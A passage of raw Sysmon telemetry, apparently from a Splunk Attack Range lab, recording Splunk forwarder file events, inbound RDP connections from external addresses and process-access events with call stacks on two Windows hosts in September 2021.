Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F05B388CBD7423BEDEC3508B27C4C557,SHA256=D500E566D2575BB947333A124CF3B480231AD03A7F0E4B1C61BC1E425824F8F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:16.762{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de62780-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:19.326{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3776F57FBEDDDE60E07A8A64E5920E7F,SHA256=84278F2A80DCD134148F4395925E8E70638C2898D153E0DE9DC5253D0AE24F0F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:17.960{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49193-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:19.368{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB24B653F6339218235EA024CBD59BF8,SHA256=F6037A8CBE4A5341183E548AF1EB2B486675E4F704BFC5FA9CE434DF63DE95AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:17.586{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55829-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:17.452{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-19028-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:20.545{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34F2E2B34E7410619EF29D2E913BE9A9,SHA256=80E0C1ADB333267D4BFDD8621EBDA43E7F5C1A82BE572B1B898C083D1C03E434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:20.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE72B48CC8F490DBBEF1AA89528FEAD3,SHA256=FFDEF284BC6E1E563CD91480A6E0F8E490771979C65296F00994D975F60C0E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:20.399{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688140870F6D281CCD1560BBB281866E,SHA256=91F13598716AF415C4FAB33F4DCFCCB5D720C05A07713A4F92752AA198A17A56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:21.813{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3E0A3A55EC5E63943EA9B8FF16E1F19,SHA256=CB9A8846B684F9040F76364960E3B58906B7CB99E55EC19FF10A9BD250324D29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:20.173{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63975-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:21.429{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22AD10F21A7B38A335E361E403ADD982,SHA256=6C23778DC4E61F2B4FEE4CC9FFD063590C888CA16CA1008878B0F9FC1EA772EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:21.623{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E15456AE4B173D54FCA19852320BEA,SHA256=426755EAECAF7DBF456BC78387EC311070C0D67E61CD370037388C94E0F62BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:22.844{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A80D71DEC88CB5D285DA9B2735203EA,SHA256=2CD945974ABE75684D9CCA59ED7422A5A3CBED4C926448622BD4D0ACE5375D1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:22.482{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3613E8935727E46AA9E64259513416,SHA256=B176DB2EBFAF955BDE93894441ABBC6745D0E44C173079D1B24C2FBB78C211E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:22.484{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=018A5F949C1D2EC19A34FCF68434FF6A,SHA256=5DBE2C44ACBBE27BF0CC35EC6A19B2A08F69BE54AA8A9421773735280B9E9D99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:23.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557D9B2E3EF30A435BE4B38466FA9FC5,SHA256=97B2FB5B64684B71520DFB623E4F97A838D1899B1BCFF79A3756BA2825B1CB58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:23.482{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D780B18ECB1B3EDF93374C796A836398,SHA256=9B07024B832D3DC7EBA8BF75B3762146CF18AEDB8516CB013B9AACCC3F637E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:24.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE94B30823A23202EB53CD82E2E85EDA,SHA256=102079E34FDE21E5F726B24E5DD76679A1E977A6D16E0EA2929F0CA5008706BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:24.497{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72D082CBA01A7A82B48C7B99A564F961,SHA256=0BAF62BA590125934AB32BC5DBA9A7F94E83C2785BA8C0EA9592CC279E17309F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:21.737{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59236-false10.0.1.12-8000- 354300x80000000000000001047574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:23.957{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49194-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:25.511{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F55FC2946783EBE8697BE0E699F609,SHA256=E89AA029F972F7D8BF2DBC4BF34D2DBFB5DC1D799C1BCC76042F37CB7625C389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:25.875{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDC3FA06888FDFEB88BAFB10E18D5A0,SHA256=D14699117654FDB34DB4813B047D2B65D9D34A53A8DA05C08FC21B95C9F4B906,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:21.989{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-48957-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:25.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E16C2B9A985E18ED9ED5E275FB705316,SHA256=5197DF7332360921E299E30C552954700F187F105C26CCFA166ABCE86E017AC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.937{69CF5F33-87EE-6151-6D79-00000000FD01}32562336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.922{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED199368330370DE5634D019A0E612EF,SHA256=AEAF6320544001D8E3814DE4212AAAE26B505E07965B6701DA11E8A0BEFCFEF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:26.516{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B432CEAB6D819545E055F1ACC8B79E0F,SHA256=DC57CA0E4A654B08984E91242B4EDA825DDDFC2BD9DFED80B3B5D52D5D50AD60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87EE-6151-6D79-00000000FD01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-87EE-6151-6D79-00000000FD01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.765{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87EE-6151-6D79-00000000FD01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 